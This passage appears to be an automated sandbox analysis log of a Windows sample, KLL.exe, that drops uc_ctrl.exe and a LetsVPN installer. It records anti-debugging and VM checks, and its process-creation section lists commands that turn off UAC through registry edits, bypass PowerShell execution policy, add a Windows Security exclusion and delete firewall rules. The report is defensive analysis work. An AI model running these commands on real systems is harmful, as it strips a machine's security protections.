Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Last function: Thread delayed
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\letsvpn-latest.exe	File Volume queried: C:\Program Files (x86) FullSizeInformation
Source: C:\ProgramData\letsvpn-latest.exe	File Volume queried: C:\Program Files (x86) FullSizeInformation

Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_0000000180027938 FindFirstFileExW,	0_2_0000000180027938
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB2E966 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,_wcslen,	19_2_6CB2E966
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDD6810 _Open_dir,FindFirstFileExW,_Read_dir,FindClose,	19_2_6CDD6810

Source: C:\Users\user\Desktop\KLL.exe

Code function: 0_2_00000001800073BC GetSystemInfo,GlobalMemoryStatusEx,

0_2_00000001800073BC

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Thread delayed: delay time: 300000
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Thread delayed: delay time: 236147
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Thread delayed: delay time: 922337203685477

Source: LetsPRO.exe, 0000003C.00000002.4042371730.00000000039AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: LetsPRO.exe, 0000003C.00000002.4075306765.0000000030A1D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: LetsPRO.exe, 0000003C.00000002.4042371730.0000000003830000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q*Hyper-V Dynamic Memory Integration Service
Source: LetsPRO.exe, 0000003C.00000002.4104741846.0000000038B9C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: svchost.exe, 0000002B.00000003.2616382956.000001B098137000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ,@vmnetextension
Source: LetsPRO.exe, 0000003C.00000002.4042371730.0000000003830000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q$Hyper-V Hypervisor Logical Processor
Source: LetsPRO.exe, 0000003C.00000002.4090583694.00000000337B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: LetsPRO.exe, 0000003C.00000002.4042371730.0000000003830000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q!Hyper-V Virtual Machine Bus Pipes
Source: LetsPRO.exe, 0000003C.00000002.4042371730.0000000003830000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partition
Source: LetsPRO.exe, 0000003C.00000002.4042371730.00000000039AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: KLL.exe, 00000000.00000002.2323627030.000002087684A000.00000004.00000020.00020000.00000000.sdmp, uc_ctrl.exe, 00000013.00000002.4023164123.0000000000F68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: LetsPRO.exe, 0000003C.00000002.4090583694.00000000336B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: LetsPRO.exe, 0000003C.00000002.4075306765.00000000308EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V epyeualeoxtkcrv Bus4&
Source: LetsPRO.exe, 0000003C.00000002.4042371730.0000000003830000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q!Hyper-V Hypervisor Root Partition
Source: LetsPRO.exe, 0000003C.00000002.4090583694.00000000337B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: mmc.exe, 00000014.00000002.4029174467.00000000030AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: LetsPRO.exe, 0000003C.00000002.4104741846.0000000038B9C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: stringComputer System ProductComputer System Product1UE3Z24D802742-3099-9C0E-C19B-2A23EA1FC420VMware, Inc.None
Source: LetsPRO.exe, 0000003C.00000002.4042371730.00000000039AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: svchost.exe, 0000002B.00000003.2616790339.000001B098121000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: *@vmnetextension
Source: svchost.exe, 0000002B.00000003.2617238401.000001B098117000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @ethernetwlanppipvmnetextension1E}
Source: LetsPRO.exe, 0000003C.00000002.4090583694.00000000336DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor;
Source: LetsPRO.exe, 0000003C.00000002.4042371730.0000000003830000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q)Hyper-V Hypervisor Root Virtual Processor
Source: svchost.exe, 0000002B.00000003.2616382956.000001B098137000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @vmnetextension
Source: LetsPRO.exe, 0000003C.00000002.4042371730.0000000003830000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: LetsPRO.exe, 0000003C.00000002.4075306765.0000000030965000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V epyeualeoxtkcrv Bus Pipes

Source: C:\Users\user\Desktop\KLL.exe

API call chain: ExitProcess graph end node

graph_0-18634

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe

Code function: 19_2_6CB00090 NtAllocateVirtualMemory,NtAllocateVirtualMemory,LdrLoadDll,

19_2_6CB00090

Source: C:\Users\user\Desktop\KLL.exe

Code function: 0_2_0000000180031138 IsDebuggerPresent,

0_2_0000000180031138

Source: C:\Users\user\Desktop\KLL.exe

Code function: 0_2_000000018000E318 GetLastError,IsDebuggerPresent,OutputDebugStringW,

0_2_000000018000E318

Source: C:\Users\user\Desktop\KLL.exe

0_2_00000001800060F0

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB00090 mov edx, dword ptr fs:[00000030h]		19_2_6CB00090
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CC626D3 mov eax, dword ptr fs:[00000030h]		19_2_6CC626D3

Source: C:\Users\user\Desktop\KLL.exe

Code function: 0_2_0000000180029078 GetProcessHeap,

0_2_0000000180029078

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_0000000180031298 SetUnhandledExceptionFilter,	0_2_0000000180031298
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_00000001800102C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00000001800102C0
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_0000000180015F04 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0000000180015F04
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_00C69003 SetUnhandledExceptionFilter,	19_2_00C69003
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_00C689AE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_00C689AE
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_00C68E6E IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00C68E6E
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CC56D47 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_6CC56D47
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CC52394 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_6CC52394
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CC51EAE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_6CC51EAE
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDFAD0D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_6CDFAD0D
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDFA241 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_6CDFA241

Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\ProgramData\letsvpn-latest.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -ExecutionPolicy Bypass -Command "If ($env:PROCESSOR_ARCHITEW6432) { $env:PROCESSOR_ARCHITEW6432 } Else { $env:PROCESSOR_ARCHITECTURE }"

Source: C:\Users\user\Desktop\KLL.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" -f C:\ProgramData\24g5n.xml	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\JM2KJ.bat"	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\SQBg9\KQ3ts~m8\s+C:\ProgramData\SQBg9\KQ3ts~m8\a C:\ProgramData\SQBg9\KQ3ts~m8\uc_guilib.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process created: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe "C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe"	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process created: C:\ProgramData\letsvpn-latest.exe "C:\ProgramData\letsvpn-latest.exe"	Jump to behavior
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -ExecutionPolicy Bypass -Command "If ($env:PROCESSOR_ARCHITEW6432) { $env:PROCESSOR_ARCHITEW6432 } Else { $env:PROCESSOR_ARCHITECTURE }"
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
Source: C:\Program Files (x86)\letsvpn\LetsPRO.exe	Process created: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe"
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ROUTE.EXE route print
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a

Source: LetsPRO.exe, 0000003C.00000002.4097109567.0000000035C42000.00000002.00000001.01000000.00000033.sdmp	Binary or memory string: Shell_TrayWnd
Source: LetsPRO.exe, 0000003C.00000002.4068679879.000000000FD56000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: LetsPRO.exe, 0000003C.00000002.4068679879.000000000FD56000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: GetWindowContextHelpIdGetWindowLongPtrWGetWindowPlacementGetWindowTextLengthWInternalGetWindowTextIsCharAlphaNumericWIsDialogMessageWIsDlgButtonCheckedIsWinEventHookInstalledLoadAcceleratorsWLoadCursorFromFileWLoadKeyboardLayoutWLoadMenuIndirectWLockSetForegroundWindowLockWindowUpdateMapVirtualKeyExWMenuItemFromPointMessageBoxIndirectWMonitorFromPointMonitorFromWindowOpenInputDesktopOpenWindowStationWPostThreadMessageWPrivateExtractIconsWRealGetWindowClassWRegisterClassExWRegisterRawInputDevicesRegisterShellHookWindowRegisterTouchWindowRegisterWindowMessageWSendDlgItemMessageWSendIMEMessageExWSendMessageCallbackWSendMessageTimeoutWSendNotifyMessageWSetCaretBlinkTimeSetClassLongPtrWSetClipboardDataSetClipboardViewerSetDebugErrorLevelSetDoubleClickTimeSetForegroundWindowSetGestureConfigSetKeyboardStateSetMenuContextHelpIdSetMenuDefaultItemSetMenuItemBitmapsSetMenuItemInfoWSetMessageExtraInfoSetProcessDefaultLayoutSetProcessWindowStationSetThreadDesktopSetUserObjectSecuritySetWindowContextHelpIdSetWindowLongPtrWSetWindowPlacementSetWindowsHookExWSwitchToThisWindowSystemParametersInfoWTrackPopupMenuExTranslateAcceleratorWTranslateMDISysAccelTranslateMessageUnhookWindowsHookUnhookWindowsHookExUnloadKeyboardLayoutUnregisterClassWUnregisterHotKeyUnregisterTouchWindowUpdateLayeredWindowUserHandleGrantAccessWINNLSGetEnableStatusWINNLSGetIMEHotkeyWaitForInputIdleCascadeChildWindowsDrawCaptionTempWGetAppCompatFlagsGetAppCompatFlags2GetCursorFrameInfoGetInternalWindowPosGetProgmanWindowGetTaskmanWindowMessageBoxTimeoutWPrivateExtractIconExWRegisterLogonProcessRegisterServicesProcessRegisterSystemThreadRegisterTasklistSetInternalWindowPosSetLogonNotifyWindowSetProgmanWindowSetShellWindowExSetSysColorsTempSetTaskmanWindowSetWindowStationUserTileChildWindowsUserRealizePaletteUserRegisterWowHandlersBeginPanningFeedbackEndPanningFeedbackUpdatePanningFeedbackBeginBufferedAnimationBeginBufferedPaintBufferedPaintClearBufferedPaintInitBufferedPaintSetAlphaBufferedPaintUnInitDrawThemeBackgroundDrawThemeBackgroundExEndBufferedAnimationEndBufferedPaintGetBufferedPaintBitsGetBufferedPaintDCGetCurrentThemeNameGetThemeAppPropertiesGetThemeEnumValueGetThemeFilenameGetThemePartSizeGetThemePositionGetThemePropertyOriginGetThemeSysColorGetThemeSysColorBrushGetThemeSysStringGetThemeTextExtentGetThemeTextMetricsHitTestThemeBackgroundIsThemePartDefinedSetThemeAppPropertiesGetFileVersionInfoSizeWGetFileVersionInfoWDrvGetModuleHandleGetDriverModuleHandleSendDriverMessagejoyReleaseCapturemciGetCreatorTaskmciGetErrorStringWmidiInGetDevCapsWmidiInGetErrorTextWmidiInGetNumDevsmidiInPrepareHeadermidiInUnprepareHeadermidiOutCacheDrumPatchesmidiOutCachePatchesmidiOutGetDevCapsWmidiOutGetErrorTextWmidiOutGetNumDevsmidiOutGetVolumemidiOutPrepareHeadermidiOutSetVolumemidiOutUnprepareHeadermidiStreamPositionmidiStreamPropertymidiStreamRestartmixerGetControlDetailsWmixerGetDevCapsWmixerGetLineControlsWmixerGetLineInfoWmixerSetControlDetailsmmioInstallIOProcWmmioStringToFOURCCWtimeGetSystemTime
Source: LetsPRO.exe, 0000003C.00000002.4151476576.0000000068E49000.00000002.00000001.01000000.00000025.sdmp	Binary or memory string: AddFontResourceWAdjustWindowRectAlready ReportedAssocIsDangerousAuditSetSecurityBITMAPINFOHEADERBringWindowToTopCRYPT_OBJID_BLOBCertControlStoreCheckRadioButtonCloseEnhMetaFileCoGetCallContextCoGetInterceptorCoMarshalHresultCoTaskMemReallocCombineTransformConnectNamedPipeContent-EncodingContent-LanguageContent-Length: CopyEnhMetaFileWCreateDIBSectionCreateDirectoryWCreateHatchBrushCreateIpNetEntryCreateJobObjectWCreateMDIWindowWCreateNamedPipeWCreatePolygonRgnCreateSemaphoreWCreateSolidBrushCreateTimerQueueCryptDestroyHashCryptExportPKCS8CryptGetKeyParamCryptMsgGetParamCryptProtectDataCryptQueryObjectCryptSetKeyParamDAD_SetDragImageDPA_EnumCallbackDdeQueryConvInfoDdeSetUserHandleDeactivateActCtxDefMDIChildProcWDefineDosDeviceWDeleteColorSpaceDeleteIpNetEntryDeleteTimerQueueDestination-PortDispatchMessageWDnsNameCompare_WDrawCaptionTempWDrawFrameControlDuplicateTokenExEndBufferedPaintEngCreatePaletteEngDeletePaletteEngDeleteSurfaceEngGetDriverNameEngStretchBltROPEngUnlockSurfaceEnumChildWindowsEnumICMProfilesWExcludeUpdateRgnExtSelectClipRgnFONTOBJ_vGetInfoFRAME_SIZE_ERRORFindFirstFreeAceFindFirstVolumeWFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GdiGetBatchLimitGdiIsMetaPrintDCGdiSetBatchLimitGetAsyncKeyStateGetBestInterfaceGetCalendarInfoWGetClassLongPtrWGetClipboardDataGetComputerNameWGetConsoleAliasWGetConsoleTitleWGetConsoleWindowGetCurrentActCtxGetCurrentObjectGetCurrentThreadGetDIBColorTableGetDesktopWindowGetDllDirectoryWGetExpandedNameWGetFileSecurityWGetFullPathNameWGetGUIThreadInfoGetGestureConfigGetGlyphIndicesWGetGlyphOutlineWGetInterfaceInfoGetIpErrorStringGetKerningPairsWGetKeyboardStateGetLastInputInfoGetLogicalDrivesGetLongPathNameWGetMenuItemCountGetMenuItemInfoWGetMenuPosFromIDGetModuleHandleWGetNamedPipeInfoGetNetworkParamsGetOpenFileNameWGetPriorityClassGetProgmanWindowGetSaveFileNameWGetScrollBarInfoGetStringScriptsGetSysColorBrushGetSystemMetricsGetTaskmanWindowGetTcpStatisticsGetTempFileNameWGetThemeFilenameGetThemePartSizeGetThemePositionGetThemeSysColorGetThreadDesktopGetUdpStatisticsGetViewportExtExGetViewportOrgExGlobalDeleteAtomHANIMATIONBUFFERHost-Remote-ListIConnectionPointICreateErrorInfoILLoadFromStreamINTERFACE_HANDLEIOleAdviseHolderIOleInPlaceFrameIP_PREFIX_ORIGINIP_SUFFIX_ORIGINIPropertyStorageIUnknown_GetSiteIUnknown_SetSiteI_CryptDetachTlsI_RpcSendReceiveIcmpParseRepliesImageList_CreateImageList_DrawExImageList_RemoveImmConfigureIMEWImmCreateContextImmGetGuideLineWImmGetOpenStatusImmGetVirtualKeyImmRegisterWordWImmSetOpenStatusImperial_AramaicInitializeFlatSBInstRuneAnyNotNLInterfaceRemovedIntlStrEqWorkerWIpReleaseAddressIsBadHugeReadPtrIsDBCSLeadByteExIsDialogMessageWIsTokenUntrustedIsValidInterfaceJasonMarshalFailK32EnumProcessesLCIDToLocaleNameLPFNVIEWCALLBACKLPPERSISTSTORAGELPPRINTPAGERANGELPSHELLFLAGSTATELPSHFILEOPSTRUCTLPWPUPOSTMESSAGELPWSANSCLASSINFOLocalLinkAddressLocaleNameToLCIDLockWindowUpdateMIB_IPADDRROW_XPMIB_IPFORWARDROWMapVirtualKeyExWMeroitic_CursiveMonitorFromPointMultiple
Source: KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2327236753.00007FF797ED4000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: QTrayIconMessageWindowClassTaskbarCreatedChangeWindowMessageFilterExuser32ChangeWindowMessageFilterThe platform plugin failed to create a message window.Shell_NotifyIconGetRectShell_TrayWndTrayNotifyWndSysPagerToolbarWindow32@
Source: LetsPRO.exe, 0000003C.00000002.4068679879.000000000FD56000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Users\user\Desktop\KLL.exe

Code function: 0_2_0000000180026C40 cpuid

0_2_0000000180026C40

Source: C:\Users\user\Desktop\KLL.exe	Code function: GetLocaleInfoW,	0_2_00000001800208DC
Source: C:\Users\user\Desktop\KLL.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_000000018002B8EC
Source: C:\Users\user\Desktop\KLL.exe	Code function: EnumSystemLocalesW,	0_2_000000018002B204
Source: C:\Users\user\Desktop\KLL.exe	Code function: EnumSystemLocalesW,	0_2_000000018002B2D4
Source: C:\Users\user\Desktop\KLL.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_000000018002B36C
Source: C:\Users\user\Desktop\KLL.exe	Code function: GetLocaleInfoW,	0_2_0000000180031398
Source: C:\Users\user\Desktop\KLL.exe	Code function: EnumSystemLocalesW,	0_2_0000000180020400
Source: C:\Users\user\Desktop\KLL.exe	Code function: GetLocaleInfoW,	0_2_000000018002B5B8
Source: C:\Users\user\Desktop\KLL.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_000000018002AEB8
Source: C:\Users\user\Desktop\KLL.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_000000018002B710
Source: C:\Users\user\Desktop\KLL.exe	Code function: GetLocaleInfoW,	0_2_000000018002B7C0
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: GetModuleHandleW,GetProcAddress,EncodePointer,DecodePointer,GetLocaleInfoEx,GetLocaleInfoW,	19_2_6CB219CE
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: _Getdateorder,___lc_locale_name_func,__crtGetLocaleInfoEx,	19_2_6CDEA720

Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
